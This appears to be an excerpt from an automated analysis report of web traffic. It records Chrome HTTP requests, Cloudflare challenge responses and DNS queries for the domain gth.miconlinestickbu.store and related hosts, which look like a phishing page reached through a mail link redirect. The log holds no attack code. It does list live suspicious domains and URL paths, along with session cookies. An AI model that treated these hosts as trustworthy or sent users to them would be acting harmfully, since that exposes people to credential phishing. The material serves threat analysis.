          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/?__cf_chl_tk=H7Kss6sfscBU7.EIkr.rv_soEijdzH_mBbfnGlV9NZE-1716390538-0.0.1.1-1578Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345db HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Referer: https://gth.miconlinestickbu.store/?__cf_chl_tk=H7Kss6sfscBU7.EIkr.rv_soEijdzH_mBbfnGlV9NZE-1716390538-0.0.1.1-1578Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /jq/617b5a702a34daddd03071650f95cbe6664e0aa35f135 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /boot/617b5a702a34daddd03071650f95cbe6664e0aa35f139 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /js/617b5a702a34daddd03071650f95cbe6664e0aa35f13a HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /APP-617b5a702a34daddd03071650f95cbe6664e0aa557459/617b5a702a34daddd03071650f95cbe6664e0aa55745b HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /o/617b5a702a34daddd03071650f95cbe6664e0aa557579 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /x/617b5a702a34daddd03071650f95cbe6664e0aa557460 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /o/617b5a702a34daddd03071650f95cbe6664e0aa557579 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficHTTP traffic detected: GET /x/617b5a702a34daddd03071650f95cbe6664e0aa557460 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
          Source: global trafficDNS traffic detected: DNS query: url12.mailanyone.net
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: vakspecialisten.store
          Source: global trafficDNS traffic detected: DNS query: gth.miconlinestickbu.store
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: unknownHTTP traffic detected: POST /report/v4?s=qVRIKX92qaRfJ6gaBUntmAPdh1Gwu3PvCRc3bNwsPhnTsilQ5DZU4Um%2B7FhcPbmw5rS%2FuybWvO1YxIIbCiiaJDTmsIr9eqHJy%2FRBl67sy9FO5QyJv%2Bk9%2FbuWnA4%2BsCQk4oY9veVPX4QDP0cfbw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 424Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:08:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16383Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:08:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16511Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16517Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:09:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: RWt2qZVk0h6ezYHtIt98iw==$reBoh9UpakQ4wt1GrQD76Q==Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XhwEhYTxMvsDY35X5QZTkQWLMJ9FuNau1Y3uvFo1auFMFx8%2BMI10Yy5zjtoritLWg1E8O1YOgGjjGOrORADfPAfryZSVp8KYP%2F1PxSn5x0%2FHYuKlD04MGzWqGVUkYUjQrHA5bECZKc0Hb1Rzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 887db9963f7a7c88-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 May 2024 15:09:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16517Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
